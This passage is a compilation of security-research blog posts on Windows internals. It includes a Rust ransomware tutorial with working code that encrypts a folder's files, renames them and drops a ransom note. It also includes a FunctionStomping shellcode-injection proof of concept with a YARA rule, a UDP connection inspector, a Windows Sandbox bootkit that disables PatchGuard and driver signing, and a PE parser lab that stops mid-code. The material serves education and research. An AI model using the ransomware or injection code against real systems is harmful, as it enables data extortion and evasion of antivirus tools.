  • The attacker has a vulnerable driver with 1-day that allows loading drivers.
  • The attacker has a zero-day that allows load drivers.

Just not so long ago when Nvidia was breached a signature was leaked and used by threat actors.

Resources

When we will continue to dive into the series, I will use a lot of references from the following amazing resources:

  • Windows Kernel Programming.
  • Windows Internals Part 7.
  • MSDN (I know I said amazing, I lied here).

And you can check out the following repositories for drivers examples:

Conclusion

This blog post may be short but is the start of the coming series of blog posts about kernel drivers and rootkits specifically. Another one, more detailed, will come out soon!

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Rust 101 - Let’s write Rustomware

star fork follow

Introduction

When I first heard about Rust, my first reaction was “Why?”. The language looked to me as a “wannabe” to C and I didn’t understand why it is so popular. I started to read more and more about this language and began to like it. To challenge myself, I decided to write rustomware in Rust. Later on, I ran into trickster0’s amazing repository OffensiveRust and that gave me more motivation to learn Rust. Nowadays I’m creating a unique C2 framework written (mostly) in Rust. If you are familiar with Rust, you can skip to Part 2 below.

The whole code for this blog post is available on my GitHub :).

Rust’s capabilities

The reason that I think that Rust is an awesome language is that it’s a powerful compiler, has memory safety, easy syntax and great interaction with the OS. Rust’s compiler takes care to alert for anything that can be problematic - A thing that can be annoying but in the end, it helps the developer to create safer programs. On the other hand, the compiler also takes care of annoying tasks that are required when programming in C like freeing memory, closing files, etc. Rust is also a cross-platform language, so it can be used on any platform and be executed differently depending on the OS.

Part 1 - Hello Rust

Enough talking and let’s start to code! The first thing we want to do is create our program, it can be done with this simple command:

cargo new rustomware
cd rustomware

In the rustsomware directory, we will have these files:

rustomware
│   .gitignore
│   Cargo.toml    
│
└───src
│   │   main.rs
│   
└───.git
    │   ...

In the main.rs file, we will write our code, and in Cargo.toml we will include our modules. To build our new program, we will use the following command:

cargo build

Our executable will be in the target directory (because we didn’t use the release flag so it will be in debugging) and will be called rustomware.exe. You’ll notice that there are a few new files and directories - the Cargo.lock file, and many files under the target directory. I won’t elaborate on them here but in general the Cargo.lock file contains the dependencies of the project in a format that can be used by Cargo to build the project. THERE IS NO NEED TO EDIT THOSE FILES. In the target directory, we will have the modules themselves, the executable and the PDB file. After we learned a bit about Rust, we can dive into coding our ransomware.

Part 2 - Iterating the target folder

Like any good ransomware, we will need to have these functionalities:

  • Encrypting files.
  • Decrypting files.
  • Dropping a README file.
  • Adding our extension to the files.

For that, we will need to use crates (modules) to help us out. First things first, we need to be able to get a list of all the files in the target directory from the argv. To do that, we can use the std library and the fs module. To use a module all we need to do is to import it:

use std::{
    env,
    fs
};

fn main() {
    let args: Vec<_> = env::args().collect();
    
    if args.len() < 2 {
        println!("Not enough arguments! Usage: rustsomware <encrypt|decrypt> <folder>");
        return;
    }

    let entries = fs::read_dir(args[2].clone()).unwrap();

    for raw_entry in entries {
        let entry = raw_entry.unwrap();

        if entry.file_type().unwrap().is_file() {
            println!("File Name: {}", entry.path().display())
        }
    }
}

Now we have a program that finds files in a folder. Notice that we used the unwrap() method to get the result, it is required because Rust functions mostly send as a result type that can be either Ok or Err. We also needed to clone the string because Rust needs to clone objects or create a safe borrow (It is not recommended to borrow objects, but it is possible and can be useful in some cases).

Part 3 - Encrypting / Decrypting the files

To encrypt the files, we will the AES cipher with a hardcoded key and IV. All that is left for us to do is to create a function that is responsible to encrypt the file and change its extension to .rustsomware. First things first, to be able to do encryption/decryption methods we will need to have a crate to help with that. Since the libaes crate isn’t a default crate, we need to import it to our project and this can be done by modifying the Cargo.toml file by adding:

[Dependencies]

libaes = "0.6.2"

Now, we can create a function that can encrypt and decrypt. For the sake of practice, we will use a hardcoded key and IV but this is NOT recommended at all.

fn encrypt_decrypt(file_name: &str, action: &str) -> bool {
    let key = b"fTjWmZq4t7w!z%C*";
    let iv = b"+MbQeThWmZq4t6w9";
    let cipher = Cipher::new_128(key);

    match action {
        "encrypt" => {
            println!("[*] Encrypting {}", file_name);
            let encrypted = cipher.cbc_encrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, encrypted).unwrap();
            let new_filename = format!("{}.rustsomware", file_name);
            fs::rename(file_name, new_filename).unwrap();
        }

        "decrypt" => {
            println!("[*] Decrypting {}", file_name);
            let decrypted = cipher.cbc_decrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, decrypted).unwrap();
            let new_filename = file_name.replace(".rustsomware", "");
            fs::rename(file_name, new_filename).unwrap();
        }

        _ => { 
            println!("[-] Invalid action!");
            return false 
        }
    }

    return true;
}

You can use the key and IV from above or generate them yourself. The code above is a simple example of how to use AES128 with Rust, pretty simple right?

As you saw, Rust has a simple interface with the file system that allows you to rename and do io operations easily. Because this is a simple example the function returns a boolean type but it is recommended to return the error to the calling function for further handling.

Part 4 - Adding pretty prints and README file

Just like any good ransomware we need to do a simple thing and add a README file. For the sake of learning, we will learn about including files statically to our binary. Create a readme.txt file with your ransom message in it (it is recommended to create it in a separate directory inside your project directory but you can also put it in the src directory). To add the file, all we need to do is to use the include_str! macro (everything that ends with ! in rust is a macro) and save it to a variable.

...

// Dropping the README.txt file.
let ransom_message = include_str!("../res/README.txt");
let readme_path = format!("{}/README_Rustsomware.txt", args[2].clone());
fs::write(readme_path, ransom_message).unwrap();

As you saw, we can just save it to a file and if we want to do any changes just change the README file and recompile, no code editing is required.

Result: result

Conclusion

In this blog post, you got a taste of Rust’s power and had fun with it by creating a simple program. I think that in the future we will see more and more infosec tools that are written in Rust. The whole code is available on my GitHub, for any questions feel free to ask me on Twitter.

Disclaimer

I’m not responsible for any damage that may occur to your computer. This article is just for educational purposes and is not intended to be used in any other way.

The good, the bad and the stomped function

28 January 2022 at 00:00

star fork follow

Introduction

When I first heard about ModuleStomping I was charmed since it wasn’t like any other known injection method.

Every other injection method has something in common: They use VirtualAllocEx to allocate a new space within the process, and ModulesStomping does something entirely different: Instead of allocating new space in the process, it stomps an existing module that will load the malicious DLL.

After I saw that I started to think: How can I use that to make an even more evasive change that won’t trigger the AV/EDR or won’t be found by the injection scanner?

The answer was pretty simple: Stomp a single function! At the time I thought it is a matter of hours to make this work, but I know now that it took me a little while to solve all the problems.

How does a simple injection look like

The general purpose of any injection is to evade anti-viruses and EDRs and be able to deliver or execute malware.

For all of the injection methods, you need to open a process with PROCESS_ALL_ACCESS permission (or a combination of permissions that allow you to spawn a thread, write and read the process’ memory).

since the injector needs to perform high-privilege operations such as writing to the memory of the process and executing the shellcode remotely. To be able to get PROCESS_ALL_ACCESS you either need that the injected process will run under your user’s context or need to have a high-privileged user running in a high-privileged context (you can read more about UAC and what is a low privileged and high-privileged admin in MSDN) or the injected process is a process that you spawned under your process and therefore have all access.

After we obtain a valid handle with the right permissions we need to allocate space to the shellcode within the remote process virtual memory with VirtualAllocEx. That gives us the space and the address we need for the shellcode to be written. After we have a page with the right permissions and enough space, we can use WriteProcessMemory to write the shellcode into the remote process.

Now, all that’s left to do is to call CreateRemoteThread with the shellcode’s address (that we got from the VirtualAllocEx) to spawn our shellcode in the other process.

To summarize:

shellcode_injection

Research - How and why FunctionStomping works?

For the sake of the POC, I chose to target User32.dll and MessageBoxW. But, unlike the regular way of using GetModuleHandle, I needed to do it remotely. For that, I used the EnumProcessModules function:

enum_process_modules

It looks like a very straightforward function and now all I needed to do is to use the good old GetProcAddress. The implementation was pretty simple: Use GetModuleFileName to get the module’s name out of the handle and then if it is the module we seek (currently User32.dll). If it is, just use GetProcAddress and get the function’s base address.

// Getting the module name.
if (GetModuleFileNameEx(procHandle, currentModule, currentModuleName, MAX_PATH - sizeof(wchar_t)) == 0) {
    std::cerr << "[-] Failed to get module name: " << GetLastError() << std::endl;
    continue;
}

// Checking if it is the module we seek.
if (StrStrI(currentModuleName, moduleName) != NULL) {

    functionBase = (BYTE*)GetProcAddress(currentModule, functionName);
    break;
}

But it didn’t work. I sat by the computer for a while, staring at the valid module handle I got and couldn’t figure out why I could not get the function pointer. At this point, I went back to MSDN and read again the description, and one thing caught my eye:

module_permissions

Well… That explains some things. I searched more about this permission and found this explanation:

load_library_as_datafile

That was very helpful to me because at this moment I knew why even when I have a valid handle, I cannot use GetProcAddress! I decided to change User32.dll and MessageBoxW to other modules and functions: Kernel32.dll and CreateFileW.

If you are wondering why Kernel32.dll and not another DLL, the reason is that Kernel32.dll is always loaded with any file (you can read more about it in the great Windows Internals books) and therefore a reliable target.

And now all that’s left is to write the POC.

POC Development - Final stages

The final step is similar to any other injection method but with one significant change: We need to use VirtualProtectEx with the base address of our function. Usually, in injections, we give set the address parameter to NULL and get back the address that is mapped for us, but since we want to overwrite an existing function we need to give the base address. After WriteProcessMemory is executed, the function is successfully stomped!

// Changing the protection to PAGE_READWRITE for the shellcode.
if (!VirtualProtectEx(procHandle, functionBase, sizeToWrite, PAGE_READWRITE, &oldPermissions)) {
    std::cerr << "[-] Failed to change protection: " << GetLastError() << std::endl;
    CloseHandle(procHandle);
    return -1;
}

SIZE_T written;

// Writing the shellcode to the remote address.
if (!WriteProcessMemory(procHandle, functionBase, shellcode, sizeof(shellcode), &written)) {
    std::cerr << "[-] Failed to overwrite function: " << GetLastError() << std::endl;
    VirtualProtectEx(procHandle, functionBase, sizeToWrite, oldPermissions, &oldPermissions);
    CloseHandle(procHandle);
    return -1;
}

At first, I used PAGE_EXECUTE_READWRITE permission to execute the shellcode but it is problematic (Although even with the PAGE_EXECUTE_READWRITE flag anti-viruses and hollows-hunter still failed to detect it - I wanted to use something else).

Because of that, I checked if there is any other permission that can help with what I wanted: To be able to execute the shellcode and still be undetected. You may ask yourself: “Why not just use PAGE_EXECUTE_READ?”

I wanted to create a single POC and be able to execute any kind of shellcode: Whether it writes to itself or not, and I’m proud to say that I found a solution for that.

I researched further about the available page permissions and one caught my eye: PAGE_EXECUTE_WRITECOPY.

page_execute_write_copy

It looks like it gives read, write and execute permissions without actually using PAGE_EXECUTE_READWRITE. I wanted to dig a little deeper into this and found an article by CyberArk that explains more about this permission and it looked like the fitting solution.

To conclude, the UML of this method looks like that:

function_stomping

Detection

Because many antiviruses failed to identify this shellcode injection technique as malicious I added a YARA signature I wrote so you can import that to your defense tools.

Acknowledgments

UdpInspector - Getting active UDP connections without sniffing

19 August 2021 at 00:00

star fork follow

UdpInspector - Getting active UDP connections without sniffing

Many times I’ve wondered how comes that there are no tools to get active UDP connections. Of course, you can always sniff with Wireshark or any other tool of your choosing but, why Netstat doesn’t have it built in? That is the point that I went on a quest to investigate the matter. Naturally, I started with MSDN to read more about what I can get about UDP connections, and that is the moment when I found these two functions:

So, I started to look at the struct they return and saw a struct named MIB_UDPTABLE.

udptable

Sadly and unsurprisingly it gave no useful information but remember this struct - It will be used in the future. This is when I started to check another path - Reverse Engineering Netstat.

I will tell you that now - It wasn’t helpful at all, but I did learn about a new undocumented function - Always good to know! When I opened Netstat I searched for the interesting part - How it gets the UDP connections? Maybe it uses a special function that would help me as well.

netstatudpfunction

After locating the area where it calls to get the UDP connections I saw that weird function: InternalGetUdpTableWithOwnerModule.

InternalGetUdpTableWithOwnerModule

After a quick check on Google, I saw that it won’t help me, there isn’t much documentation about it. After I realized that it won’t help I went back to the source: The GetExtendedUdpTable function.

After rechecking it I found out that it gives also the PIDs of the processes that communicate in UDP. That is the moment when I understood and built a baseline of what will be my first step in solving the problem: GetExtendedUdpTable and then get the socket out of the process. But it wasn’t enough. I needed somehow to iterate and locate the socket that the process holds. After opening process explorer I saw something unusual - I excepted to see something like \device\udp or \device\tcp but I saw instead a weird \device\afd. After we duplicated the socket we are one step from the entire solution: What is left is to extract the remote address and port. Confusingly, the function that needs to use is getsockname and not getpeername - Although the getpeername function theoretically should be used.

Summing up, these are the steps that you need to apply to do it:

  • Get all the PIDs that are currently communicating via UDP (via GetExtendedUdpTable)

  • Enumerate the PIDs and extract their handles table (NtQueryInformation, NtQueryObject)

  • Duplicate the handle to the socket (identified with \Device\Afd)

  • Extract from the socket the remote address

Bootkitting Windows Sandbox

29 August 2022 at 23:00

Introduction & Motivation

Windows Sandbox is a feature that Microsoft added to Windows back in May 2019. As Microsoft puts it:

Windows Sandbox provides a lightweight desktop environment to safely run applications in isolation. Software installed inside the Windows Sandbox environment remains “sandboxed” and runs separately from the host machine.

The startup is usually very fast and the user experience is great. You can configure it with a .wsb file and then double click that file to start a clean VM.

The sandbox can be useful for malware analysis and as we will show in this article, it can also be used for kernel research and driver development. We will take things a step further though and share how we can intercept the boot process and patch the kernel during startup with a bootkit.

TLDR: Visit the SandboxBootkit repository to try out the bootkit for yourself.

Windows Sandbox for driver development

A few years back Jonas L tweeted about the undocumented command CmDiag. It turns out that it is almost trivial to enable test signing and kernel debugging in the sandbox (this part was copied straight from my StackOverflow answer).

First you need to enable development mode (everything needs to be run from an Administrator command prompt):

CmDiag DevelopmentMode -On

Then enable network debugging (you can see additional options with CmDiag Debug):

CmDiag Debug -On -Net

This should give you the connection string:

Debugging successfully enabled.

Connection string: -k net:port=50100,key=cl.ea.rt.ext,target=<ContainerHostIp> -v

Now start WinDbg and connect to 127.0.0.1:

windbg.exe -k net:port=50100,key=cl.ea.rt.ext,target=127.0.0.1 -v

Then you start Windows Sandbox and it should connect:

Microsoft (R) Windows Debugger Version 10.0.22621.1 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Using NET for debugging
Opened WinSock 2.0
Using IPv4 only.
Waiting to reconnect...
Connected to target 127.0.0.1 on port 50100 on local IP <xxx.xxx.xxx.xxx>.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 19041 x64 target at (Sun Aug  7 10:32:11.311 2022 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.

Now in order to load your driver you have to copy it into the sandbox and you can use sc create and sc start to run it. Obviously most device drivers will not work/freeze the VM but this can certainly be helpful for research.

The downside of course is that you need to do quite a bit of manual work and this is not exactly a smooth development experience. Likely you can improve it with the <MappedFolder> and <LogonCommand> options in your .wsb file.

PatchGuard & DSE

Running Windows Sandbox with a debugger attached will disable PatchGuard and with test signing enabled you can run your own kernel code. Attaching a debugger every time is not ideal though. Startup times are increased by a lot and software might detect kernel debugging and refuse to run. Additionally it seems that the network connection is not necessarily stable across host reboots and you need to restart WinDbg every time to attach the debugger to the sandbox.

Tooling similar to EfiGuard would be ideal for our purposes and in the rest of the post we will look at implementing our own bootkit with equivalent functionality.

Windows Sandbox internals recap

Back in March 2021 a great article called Playing in the (Windows) Sandbox came out. This article has a lot of information about the internals and a lot of the information below comes from there. Another good resource is Microsoft’s official Windows Sandbox architecture page.

Windows Sandbox uses VHDx layering and NTFS magic to allow the VM to be extremely lightweight. Most of the system files are actually NTFS reparse points that point to the host file system. For our purposes the relevant file is BaseLayer.vhdx (more details in the references above).

What the article did not mention is that there is a folder called BaseLayer pointing directly inside the mounted BaseLayer.vhdx at the following path on the host:

C:\ProgramData\Microsoft\Windows\Containers\BaseImages\<GUID>\BaseLayer

This is handy because it allows us to read/write to the Windows Sandbox file system without having to stop/restart CmService every time we want to try something. The only catch is that you need to run as TrustedInstaller and you need to enable development mode to modify files there.

When you enable development mode there will also be an additional folder called DebugLayer in the same location. This folder exists on the host file system and allows us to overwrite certain files (BCD, registry hives) without having to modify the BaseLayer. The configuration for the DebugLayer appears to be in BaseLayer\Bindings\Debug, but no further time was spent investigating. The downside of enabling development mode is that snapshots are disabled and as a result startup times are significantly increased. After modifying something in the BaseLayer and disabling development mode you also need to delete the Snapshots folder and restart CmService to apply the changes.

Getting code execution at boot time

To understand how to get code execution at boot time you need some background on UEFI. We released Introduction to UEFI a few years back and there is also a very informative series called Geeking out with the UEFI boot manager that is useful for our purposes.

In our case it is enough to know that the firmware will try to load EFI\Boot\bootx64.efi from the default boot device first. You can override this behavior by setting the BootOrder UEFI variable. To find out how Windows Sandbox boots you can run the following PowerShell commands:

> Set-ExecutionPolicy -ExecutionPolicy Unrestricted
> Install-Module UEFI
> Get-UEFIVariable -VariableName BootOrder -AsByteArray
0
0
> Get-UEFIVariable -VariableName Boot0000
VMBus File SystemVMBus\EFI\Microsoft\Boot\bootmgfw.efi

From this we can derive that Windows Sandbox first loads:

\EFI\Microsoft\Boot\bootmgfw.efi

As described in the previous section we can access this file on the host (as TrustedInstaller) via the following path:

C:\ProgramData\Microsoft\Windows\Containers\BaseImages\<GUID>\BaseLayer\Files\EFI\Microsoft\Boot\bootmgfw.efi

To verify our assumption we can rename the file and try to start Windows Sandbox. If you check in Process Monitor you will see vmwp.exe fails to open bootmgfw.efi and nothing happens after that.

Perhaps it is possible to modify UEFI variables and change Boot0000 (Hyper-V Manager can do this for regular VMs so probably there is a way), but for now it will be easier to modify bootmgfw.efi directly.

Bootkit overview

To gain code execution we embed a copy of our payload inside bootmgfw and then we modify the entry point to our payload.

Our EfiEntry does the following:

  • Get the image base/size of the currently running module
  • Relocate the image when necessary
  • Hook the BootServices->OpenProtocol function
  • Get the original AddressOfEntryPoint from the .bootkit section
  • Execute the original entry point

To simplify the injection of SandboxBootkit.efi into the .bootkit section we use the linker flags /FILEALIGN:0x1000 /ALIGN:0x1000. This sets the FileAlignment and SectionAlignment to PAGE_SIZE, which means the file on disk and in-memory are mapped one-to-one.

Bootkit hooks

Note: Many of the ideas presented here come from the DmaBackdoorHv project by Dmytro Oleksiuk, go check it out!

The first issue you run into when modifying bootmgfw.efi on disk is that the self integrity checks will fail. The function responsible for this is called BmFwVerifySelfIntegrity and it directly reads the file from the device (e.g. it does not use the UEFI BootServices API). To bypass this there are two options:

  1. Hook BmFwVerifySelfIntegrity to return STATUS_SUCCESS
  2. Use bcdedit /set {bootmgr} nointegritychecks on to skip the integrity checks. Likely it is possible to inject this option dynamically by modifying the LoadOptions, but this was not explored further

Initially we opted to use bcdedit, but this can be detected from within the sandbox so instead we patch BmFwVerifySelfIntegrity.

We are able to hook into winload.efi by replacing the boot services OpenProtocol function pointer. This function gets called by EfiOpenProtocol, which gets executed as part of winload!BlInitializeLibrary.

In the hook we walk from the return address to the ImageBase and check if the image exports BlImgLoadPEImageEx. The OpenProtocol hook is then restored and the BlImgLoadPEImageEx function is detoured. This function is nice because it allows us to modify ntoskrnl.exe right after it is loaded (and before the entry point is called).

If we detect the loaded image is ntoskrnl.exe we call HookNtoskrnl where we disable PatchGuard and DSE. EfiGuard patches very similar locations so we will not go into much detail here, but here is a quick overview:

  • Driver Signature Enforcement is disabled by patching the parameter to CiInitialize in the function SepInitializeCodeIntegrity
  • PatchGuard is disabled by modifying the KeInitAmd64SpecificState initialization routine

Bonus: Logging from Windows Sandbox

To debug the bootkit on a regular Hyper-V VM there is a great guide by tansadat. Unfortunately there is no known way to enable serial port output for Windows Sandbox (please reach out if you know of one) and we have to find a different way of getting logs out.

Luckily for us Process Monitor allows us to see sandbox file system accesses (filter for vmwp.exe), which allows for a neat trick: accessing a file called \EFI\my log string. As long as we keep the path length under 256 characters and exclude certain characters this works great!

Procmon showing log strings from the bootkit

A more primitive way of debugging is to just kill the VM at certain points to test if code is executing as expected:

void Die() {
    // At least one of these should kill the VM
    __fastfail(1);
    __int2c();
    __ud2();
    *(UINT8*)0xFFFFFFFFFFFFFFFFull = 1;
}

Bonus: Getting started with UEFI

The SandboxBootkit project only uses the headers of the EDK2 project. This might not be convenient when starting out (we had to implement our own EfiQueryDevicePath for instance) and it might be easier to get started with the VisualUefi project.

Final words

That is all for now. You should now be able to load a driver like TitanHide without having to worry about enabling test signing or disabling PatchGuard! With a bit of registry modifications you should also be able to load DTrace (or the more hackable implementation STrace) to monitor syscalls happening inside the sandbox.

A dive into the PE file format - LAB 1: Writing a PE Parser

By: 0xRick
29 October 2021 at 01:00

A dive into the PE file format - LAB 1: Writing a PE Parser

Introduction

In the previous posts we’ve discussed the basic structure of PE files, In this post we’re going to apply this knowledge into building a PE file parser in c++ as a proof of concept.

The parser we’re going to build will not be a full parser and is not intended to be used as a reliable tool, this is only an exercise to better understand the PE file structure.
We’re going to focus on PE32 and PE32+ files, and we’ll only parse the following parts of the file:

  • DOS Header
  • Rich Header
  • NT Headers
  • Data Directories (within the Optional Header)
  • Section Headers
  • Import Table
  • Base Relocations Table

The code of this project can be found on my github profile.


Initial Setup

Process Outline

We want out parser to follow the following process:

  1. Read a file.
  2. Validate that it’s a PE file.
  3. Determine whether it’s a PE32 or a PE32+.
  4. Parse out the following structures:
    • DOS Header
    • Rich Header
    • NT Headers
    • Section Headers
    • Import Data Directory
    • Base Relocation Data Directory
  5. Print out the following information:
    • File name and type.
    • DOS Header:
      • Magic value.
      • Address of new exe header.
    • Each entry of the Rich Header, decrypted and decoded.
    • NT Headers - PE file signature.
    • NT Headers - File Header:
      • Machine value.
      • Number of sections.
      • Size of Optional Header.
    • NT Headers - Optional Header:
      • Magic value.
      • Size of code section.
      • Size of initialized data.
      • Size of uninitialized data.
      • Address of entry point.
      • RVA of start of code section.
      • Desired Image Base.
      • Section alignment.
      • File alignment.
      • Size of image.
      • Size of headers.
    • For each Data Directory: its name, RVA and size.
    • For each Section Header:
      • Section name.
      • Section virtual address and size.
      • Section raw data pointer and size.
      • Section characteristics value.
    • Import Table:
      • For each DLL:
        • DLL name.
        • ILT and IAT RVAs.
        • Whether its a bound import or not.
        • for every imported function:
          • Ordinal if ordinal/name flag is 1.
          • Name, hint and Hint/Name table RVA if ordinal/name flag is 0.
    • Base Relocation Table:
      • For each block:
        • Page RVA.
        • Block size.
        • Number of entries.
        • For each entry:
          • Raw value.
          • Relocation offset.
          • Relocation Type.

winnt.h Definitions

We will need the following definitions from the winnt.h header:

  • Types:
    • BYTE
    • WORD
    • DWORD
    • QWORD
    • LONG
    • LONGLONG
    • ULONGLONG
  • Constants:
    • IMAGE_NT_OPTIONAL_HDR32_MAGIC
    • IMAGE_NT_OPTIONAL_HDR64_MAGIC
    • IMAGE_NUMBEROF_DIRECTORY_ENTRIES
    • IMAGE_DOS_SIGNATURE
    • IMAGE_DIRECTORY_ENTRY_EXPORT
    • IMAGE_DIRECTORY_ENTRY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_RESOURCE
    • IMAGE_DIRECTORY_ENTRY_EXCEPTION
    • IMAGE_DIRECTORY_ENTRY_SECURITY
    • IMAGE_DIRECTORY_ENTRY_BASERELOC
    • IMAGE_DIRECTORY_ENTRY_DEBUG
    • IMAGE_DIRECTORY_ENTRY_ARCHITECTURE
    • IMAGE_DIRECTORY_ENTRY_GLOBALPTR
    • IMAGE_DIRECTORY_ENTRY_TLS
    • IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    • IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
    • IMAGE_DIRECTORY_ENTRY_IAT
    • IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    • IMAGE_SIZEOF_SHORT_NAME
    • IMAGE_SIZEOF_SECTION_HEADER
  • Structures:
    • IMAGE_DOS_HEADER
    • IMAGE_DATA_DIRECTORY
    • IMAGE_OPTIONAL_HEADER32
    • IMAGE_OPTIONAL_HEADER64
    • IMAGE_FILE_HEADER
    • IMAGE_NT_HEADERS32
    • IMAGE_NT_HEADERS64
    • IMAGE_IMPORT_DESCRIPTOR
    • IMAGE_IMPORT_BY_NAME
    • IMAGE_BASE_RELOCATION
    • IMAGE_SECTION_HEADER

I took these definitions from winnt.h and added them to a new header called winntdef.h.

winntdef.h:

typedef unsigned char BYTE;
typedef unsigned short WORD;
typedef unsigned long DWORD;
typedef unsigned long long QWORD;
typedef unsigned long LONG;
typedef __int64 LONGLONG;
typedef unsigned __int64 ULONGLONG;

#define ___IMAGE_NT_OPTIONAL_HDR32_MAGIC       0x10b
#define ___IMAGE_NT_OPTIONAL_HDR64_MAGIC       0x20b
#define ___IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
#define ___IMAGE_DOS_SIGNATURE                 0x5A4D

#define ___IMAGE_DIRECTORY_ENTRY_EXPORT          0
#define ___IMAGE_DIRECTORY_ENTRY_IMPORT          1
#define ___IMAGE_DIRECTORY_ENTRY_RESOURCE        2
#define ___IMAGE_DIRECTORY_ENTRY_EXCEPTION       3
#define ___IMAGE_DIRECTORY_ENTRY_SECURITY        4
#define ___IMAGE_DIRECTORY_ENTRY_BASERELOC       5
#define ___IMAGE_DIRECTORY_ENTRY_DEBUG           6
#define ___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7
#define ___IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8
#define ___IMAGE_DIRECTORY_ENTRY_TLS             9
#define ___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10
#define ___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11
#define ___IMAGE_DIRECTORY_ENTRY_IAT            12
#define ___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13
#define ___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14

#define ___IMAGE_SIZEOF_SHORT_NAME              8
#define ___IMAGE_SIZEOF_SECTION_HEADER          40

typedef struct __IMAGE_DOS_HEADER {
    WORD   e_magic;
    WORD   e_cblp;
    WORD   e_cp;
    WORD   e_crlc;
    WORD   e_cparhdr;
    WORD   e_minalloc;
    WORD   e_maxalloc;
    WORD   e_ss;
    WORD   e_sp;
    WORD   e_csum;
    WORD   e_ip;
    WORD   e_cs;
    WORD   e_lfarlc;
    WORD   e_ovno;
    WORD   e_res[4];
    WORD   e_oemid;
    WORD   e_oeminfo;
    WORD   e_res2[10];
    LONG   e_lfanew;
} ___IMAGE_DOS_HEADER, * ___PIMAGE_DOS_HEADER;

typedef struct __IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} ___IMAGE_DATA_DIRECTORY, * ___PIMAGE_DATA_DIRECTORY;


typedef struct __IMAGE_OPTIONAL_HEADER {
    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;
    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER32, * ___PIMAGE_OPTIONAL_HEADER32;

typedef struct __IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER64, * ___PIMAGE_OPTIONAL_HEADER64;

typedef struct __IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} ___IMAGE_FILE_HEADER, * ___PIMAGE_FILE_HEADER;

typedef struct __IMAGE_NT_HEADERS64 {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} ___IMAGE_NT_HEADERS64, * ___PIMAGE_NT_HEADERS64;

typedef struct __IMAGE_NT_HEADERS {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} ___IMAGE_NT_HEADERS32, * ___PIMAGE_NT_HEADERS32;

typedef struct __IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} ___IMAGE_IMPORT_DESCRIPTOR, * ___PIMAGE_IMPORT_DESCRIPTOR;

typedef struct __IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    char   Name[100];
} ___IMAGE_IMPORT_BY_NAME, * ___PIMAGE_IMPORT_BY_NAME;

typedef struct __IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
